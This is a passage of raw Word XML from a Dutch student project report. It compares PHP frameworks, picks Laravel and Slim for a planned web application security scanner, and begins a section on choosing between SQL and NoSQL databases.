      </w:pPr>
      <w:r w:rsidRPr="004907AA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>YII2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAAEDC5" w14:textId="0A7D02CC" w:rsidR="00866303" w:rsidRDefault="001312A1">
      <w:r>
        <w:t xml:space="preserve">YII2 </w:t>
      </w:r>
      <w:r w:rsidR="00401D44">
        <w:t xml:space="preserve">is een Framework </w:t>
      </w:r>
      <w:r w:rsidR="00CD2D76">
        <w:t>dat OOP en DRY gebruikt als programmeer concepten. Het heeft</w:t>
      </w:r>
      <w:r w:rsidR="00401D44">
        <w:t xml:space="preserve"> veel features out-of-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00401D44">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00401D44">
        <w:t>-box voor het</w:t>
      </w:r>
      <w:r w:rsidR="00CD2D76">
        <w:t xml:space="preserve"> snel</w:t>
      </w:r>
      <w:r w:rsidR="00401D44">
        <w:t xml:space="preserve"> ontwi</w:t>
      </w:r>
      <w:r w:rsidR="00D02892">
        <w:t xml:space="preserve">kkelen van een moderne website. </w:t>
      </w:r>
      <w:r w:rsidR="00CD2D76">
        <w:t>Het is geschikt voor het</w:t>
      </w:r>
      <w:r w:rsidR="00D02892">
        <w:t xml:space="preserve"> bouwen van complexe webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00CD2D76">
        <w:t xml:space="preserve"> als </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD2D76">
        <w:t>CMS</w:t>
      </w:r>
      <w:r w:rsidR="005876CA">
        <w:t>’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005876CA">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005876CA">
        <w:t>CRM’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00866303">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A32FFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DCA657" w14:textId="77777777" w:rsidR="00287A5E" w:rsidRDefault="00287A5E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3391D4EA" w14:textId="77777777" w:rsidR="00D5423C" w:rsidRDefault="00D5423C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C90C96C" w14:textId="7888CF9E" w:rsidR="00866303" w:rsidRPr="002C7958" w:rsidRDefault="002C7958">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7958">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Zend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B59D08" w14:textId="7FAAC742" w:rsidR="00F72EE2" w:rsidRPr="00AA654E" w:rsidRDefault="0076510D">
      <w:r>
        <w:t xml:space="preserve">Zend is </w:t>
      </w:r>
      <w:r w:rsidR="001E700F">
        <w:t xml:space="preserve">een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E700F">
        <w:t>robuste</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E700F">
        <w:t xml:space="preserve"> en stabiele PHP Framework met </w:t>
      </w:r>
      <w:r>
        <w:t>dat al 9 jaar oud is, vele grote bedrijven gebruik</w:t>
      </w:r>
      <w:r w:rsidR="00E27B18">
        <w:t xml:space="preserve">en Zend voor hun </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE0156">
        <w:t>webprojecten</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E27B18">
        <w:t xml:space="preserve">. Zend is een PHP Framework die niet geschikt is voor klein tot middelgrote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE0156">
        <w:t>webprojecten</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E27B18">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439EFE1E" w14:textId="109F275C" w:rsidR="008D5DD7" w:rsidRPr="0093287C" w:rsidRDefault="008D5DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093287C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Symphony2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405C9336" w14:textId="1DE4A234" w:rsidR="008D5DD7" w:rsidRDefault="00801FA5">
      <w:r>
        <w:t xml:space="preserve">Wat voor Zend geldt, geldt ook voor Symphony. Het is een PHP Framework dat </w:t>
      </w:r>
      <w:r w:rsidR="00A706A6">
        <w:t>bedoeld</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is voor grote complexe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enterprice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> projecten. </w:t>
      </w:r>
      <w:r w:rsidR="00600F5F">
        <w:t xml:space="preserve">Het heeft een grote set van herbruikbare componenten. Veel van deze componenten worden door andere Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00600F5F">
        <w:t>Frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00600F5F">
        <w:t xml:space="preserve"> gebruikt</w:t>
      </w:r>
      <w:r w:rsidR="006003E1">
        <w:t xml:space="preserve"> zoals </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006003E1">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006003E1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AF57F1">
        <w:t xml:space="preserve"> Door de omvang is het jammer genoeg ook een trage </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AF57F1">
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF57F1">
        <w:t xml:space="preserve"> zoals te zien is in tabel 3.7.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE4C31" w14:textId="13F98C95" w:rsidR="00AF57F1" w:rsidRPr="0060389D" w:rsidRDefault="0060389D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0060389D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B990B08" w14:textId="010E4BAB" w:rsidR="008F4FD9" w:rsidRDefault="009D2A5E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is een relatief new PHP Framework, ge</w:t>
      </w:r>
      <w:r w:rsidR="007D3A63">
        <w:t xml:space="preserve">ïntroduceerd in 2011 en volgens </w:t>
      </w:r>
      <w:r w:rsidR="002C3BA2">
        <w:t xml:space="preserve">een </w:t>
      </w:r>
      <w:r w:rsidR="007D3A63">
        <w:t>Sitepoint</w:t>
      </w:r>
      <w:r w:rsidR="002C3BA2">
        <w:t xml:space="preserve"> enquête (Sitepoint, 2015), </w:t>
      </w:r>
      <w:r w:rsidR="00D35189">
        <w:t xml:space="preserve">verreweg </w:t>
      </w:r>
      <w:r w:rsidR="002C3BA2">
        <w:t>het meest populaire</w:t>
      </w:r>
      <w:r w:rsidR="00A03913">
        <w:t>, Symphony is tweede geëindigd.</w:t>
      </w:r>
      <w:r w:rsidR="00753BA1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA549E">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA549E">
        <w:t xml:space="preserve"> biedt een essentiële set van features voor zowel kleine als grote projecten. Het heeft een actieve </w:t>
      </w:r>
      <w:r w:rsidR="00AA27B5">
        <w:t>onlinegemeenschap</w:t>
      </w:r>
      <w:r w:rsidR="00EA549E">
        <w:t xml:space="preserve"> die </w:t>
      </w:r>
      <w:r w:rsidR="00B4758D">
        <w:t xml:space="preserve">ondersteuning bieden op gebied van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B4758D">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B4758D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00033EED">
        <w:t>applicatieontwikkeling</w:t>
      </w:r>
      <w:r w:rsidR="00B4758D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EA549E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00560CFF" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">De out-of-the-box </w:t>
      </w:r>
      <w:r w:rsidR="008758AC" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">features van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008758AC" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008758AC" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008758AC" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>zijn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008758AC" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008758AC" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>o.a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008758AC" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AA27B5" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA27B5" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Authenticatie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA27B5" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">, Artisan Console, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC28E9" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>RESTfull</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC28E9" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00560CFF" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Routing, </w:t>
      </w:r>
      <w:r w:rsidR="005019B1" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Migration, </w:t>
      </w:r>
      <w:r w:rsidR="00560CFF" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ORM, Composer</w:t>
      </w:r>
      <w:r w:rsidR="00AA27B5" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA27B5" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>depandancy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA27B5" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> manager</w:t>
      </w:r>
      <w:r w:rsidR="00560CFF" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00033EED" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CLI-support</w:t>
      </w:r>
      <w:r w:rsidR="00A03BF8" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>, Blade</w:t>
      </w:r>
      <w:r w:rsidR="00033EED" w:rsidRPr="00A54AEF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F4FD9">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F4FD9">
        <w:t xml:space="preserve"> is misschien niet de snelste PHP Framework</w:t>
      </w:r>
      <w:r w:rsidR="004A33E4">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008F4FD9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A33E4">
        <w:t>dit komt grotendeels omdat het componenten uit Symphony gebruikt,</w:t>
      </w:r>
      <w:r w:rsidR="00E85580">
        <w:t xml:space="preserve"> maar door de uitgebreide </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E85580">
        <w:t>toolbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E85580">
        <w:t xml:space="preserve">, grote </w:t>
      </w:r>
      <w:r w:rsidR="00936BC8">
        <w:t>supportgemeenschap</w:t>
      </w:r>
      <w:r w:rsidR="00E85580">
        <w:t xml:space="preserve"> en</w:t>
      </w:r>
      <w:r w:rsidR="00936BC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD7A57">
        <w:t>makkelijk te leren Framework</w:t>
      </w:r>
      <w:r w:rsidR="00CE2D4B">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BD7A57">
        <w:t xml:space="preserve"> maakt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF6377">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF6377">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B75C7C">
        <w:t xml:space="preserve">geschikt </w:t>
      </w:r>
      <w:r w:rsidR="00BD7A57">
        <w:t xml:space="preserve">voor iedere </w:t>
      </w:r>
      <w:r w:rsidR="00EF6377">
        <w:t>PHP-project</w:t>
      </w:r>
      <w:r w:rsidR="00BD7A57">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085BFF59" w14:textId="604A0227" w:rsidR="008D5DD7" w:rsidRPr="005242F7" w:rsidRDefault="008F4FD9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005242F7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Conclusie</w:t>
      </w:r>
      <w:r w:rsidR="00560CFF" w:rsidRPr="005242F7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF6FD3C" w14:textId="4A5DA6C9" w:rsidR="007B4EE7" w:rsidRPr="00125BFE" w:rsidRDefault="007B4EE7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00125BFE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DC5FFC7" w14:textId="2B33E71D" w:rsidR="00D714A2" w:rsidRDefault="00CC21CC">
      <w:r>
        <w:t xml:space="preserve">Voor dit project (Web </w:t>
      </w:r>
      <w:r w:rsidR="004D2B70">
        <w:t>Applicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Scanner) is iedere PHP Framework geschikt</w:t>
      </w:r>
      <w:r w:rsidR="00E4088A">
        <w:t xml:space="preserve">, er zullen geen problemen zijn met de performance simpel weg omdat ik een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E4088A">
        <w:t>Minimal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E4088A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E4088A">
        <w:t>Vaible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E4088A">
        <w:t xml:space="preserve"> Product ga maken wat klein in schaal is. Wat wel belangrijk is voor het project is dat de PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E4088A">
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E4088A">
        <w:t xml:space="preserve"> de specifieke tools die ik nodig heb</w:t>
      </w:r>
      <w:r w:rsidR="00B94D25">
        <w:t xml:space="preserve"> voor het ontwikkelen van de Web </w:t>
      </w:r>
      <w:r w:rsidR="00CE6029">
        <w:t xml:space="preserve">Applicatie </w:t>
      </w:r>
      <w:r w:rsidR="00B94D25">
        <w:t>Scanner</w:t>
      </w:r>
      <w:r w:rsidR="0026778C">
        <w:t xml:space="preserve"> bevat. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0026778C">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0026778C">
        <w:t xml:space="preserve"> is de PHP Framework die mij de tools, flexibiliteit en ondersteuning kan bieden om van dit project een geslaagd </w:t>
      </w:r>
      <w:r w:rsidR="005034D0">
        <w:t>project te maken.</w:t>
      </w:r>
      <w:r w:rsidR="00B94D25">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E4088A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B857D1" w14:textId="44381D21" w:rsidR="00B93343" w:rsidRDefault="00125BFE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Slim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F11825" w14:textId="7620E63C" w:rsidR="00125BFE" w:rsidRPr="00CE7C29" w:rsidRDefault="006977DB">
      <w:r>
        <w:t xml:space="preserve">Wat betreft de API die ik ga bouwen zal ik </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gebuik</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> maken van de Framework Slim. Een API is in de meeste gevallen een kleine lichte programma die gebouwd kan worden met een Micro Framework zoals Slim.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D0574B" w14:textId="77777777" w:rsidR="00CE02C1" w:rsidRDefault="00CE02C1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15150DF8" w14:textId="33937E7D" w:rsidR="0060748C" w:rsidRDefault="00E76906" w:rsidP="00E13197">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc491022077"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00607C53">
        <w:t>Database</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="56E13070" w14:textId="2F5FDF64" w:rsidR="00282023" w:rsidRDefault="00D7147C">
      <w:r>
        <w:t xml:space="preserve">Het kiezen van een web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is een belangrijke stap richting het ontwikkelen van een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>web applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC2FA5">
        <w:t>een bijna zo even belangrijke stap is het kiezen van een database</w:t>
      </w:r>
      <w:r w:rsidR="00A20BFD">
        <w:t>managementsysteem of in het kort DBMS</w:t>
      </w:r>
      <w:r w:rsidR="00BC2FA5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A20BFD">
        <w:t xml:space="preserve">Een DBMS is in de meeste gevallen open source dus gratis voor gebruik, zo ook </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A20BFD">
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A20BFD">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A20BFD">
        <w:t>PostgrSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A20BFD">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D43CAA">
        <w:t xml:space="preserve">Een database zorgt voor de </w:t>
      </w:r>
      <w:r w:rsidR="00F31445">
        <w:t>opslagmogelijkheden</w:t>
      </w:r>
      <w:r w:rsidR="00D43CAA">
        <w:t xml:space="preserve"> van data. </w:t>
      </w:r>
      <w:r w:rsidR="00AF4973">
        <w:t>Data dat geproduceerd w</w:t>
      </w:r>
      <w:r w:rsidR="00AD0852">
        <w:t xml:space="preserve">ordt door een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AD0852">
        <w:t>web applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AD0852">
        <w:t xml:space="preserve">, iets wat een </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="00AD0852">
        <w:t xml:space="preserve"> wel degelijk doet</w:t>
      </w:r>
      <w:r w:rsidR="00715F27">
        <w:t xml:space="preserve"> (H, 3.3)</w:t>
      </w:r>
      <w:r w:rsidR="00AD0852">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BB7403">
        <w:t xml:space="preserve">Het verzamelen en opslaan van website hyperlinks kan een </w:t>
      </w:r>
      <w:r w:rsidR="009A38B5">
        <w:t>accumulatief</w:t>
      </w:r>
      <w:r w:rsidR="00BB7403">
        <w:t xml:space="preserve"> proces zijn. Bij een crawl proces kunnen er wel duizenden hyperlinks verzameld worden</w:t>
      </w:r>
      <w:r w:rsidR="00160631">
        <w:t>, in een rap tempo.</w:t>
      </w:r>
      <w:r w:rsidR="00D529FF">
        <w:t xml:space="preserve"> Maar niet alleen dat tijdens een scan kunnen er duizenden aanvallen uitgevoerd worden, de data hiervan zal ook moeten worden opgeslage</w:t>
      </w:r>
      <w:r w:rsidR="008D658B">
        <w:t xml:space="preserve">n. Kortom een DBMS is een zeer cruciaal component van het gehele systeem. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B8DB97" w14:textId="701F60D3" w:rsidR="00AB241B" w:rsidRDefault="00D369E3">
      <w:r>
        <w:t>Er zijn over het algemeen twee type data</w:t>
      </w:r>
      <w:r w:rsidR="008622BE">
        <w:t>basemanagementsystemen SQL (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008622BE">
        <w:t>Structured</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008622BE">
        <w:t xml:space="preserve"> Query Language) en NOSQL </w:t>
      </w:r>
      <w:r w:rsidR="005E03BD">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E03BD">
        <w:t>Not</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E03BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E03BD">
        <w:t>Only</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E03BD">
        <w:t xml:space="preserve"> SQL)</w:t>
      </w:r>
      <w:r w:rsidR="00DC12C9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D2621A">
        <w:t xml:space="preserve">SQL wordt al meer dan 4 decennia in de professionele werkveld gebruikt en het gebruik is in de jaren 90 </w:t>
      </w:r>
      <w:r w:rsidR="00D2621A" w:rsidRPr="00D2621A">
        <w:t>exponentieel</w:t>
      </w:r>
      <w:r w:rsidR="00FF26BC">
        <w:t xml:space="preserve"> gestegen me</w:t>
      </w:r>
      <w:r w:rsidR="00753D20">
        <w:t xml:space="preserve">t de komst van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00753D20">
        <w:t>web applicaties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00753D20">
        <w:t xml:space="preserve"> en open source optie als </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00753D20">
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00753D20">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00753D20">
        <w:t>SQLite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00753D20">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DE20AF">
        <w:t xml:space="preserve"> NOSQL </w:t>
      </w:r>
      <w:r w:rsidR="00173DC0">
        <w:t>daarentegen</w:t>
      </w:r>
      <w:r w:rsidR="009E11D4">
        <w:t xml:space="preserve"> bestaat</w:t>
      </w:r>
      <w:r w:rsidR="00DE20AF">
        <w:t xml:space="preserve"> al s</w:t>
      </w:r>
      <w:r w:rsidR="005D53A2">
        <w:t xml:space="preserve">inds de jaren 60 maar wordt pas recentelijk gezien als een waardige DBMS met de komst van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D53A2">
        <w:t>MongoDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005D53A2">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D53A2">
        <w:t>CouchDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00262C50">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00262C50">
        <w:t>Redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00262C50">
        <w:t xml:space="preserve"> en Cassandra. </w:t>
      </w:r>
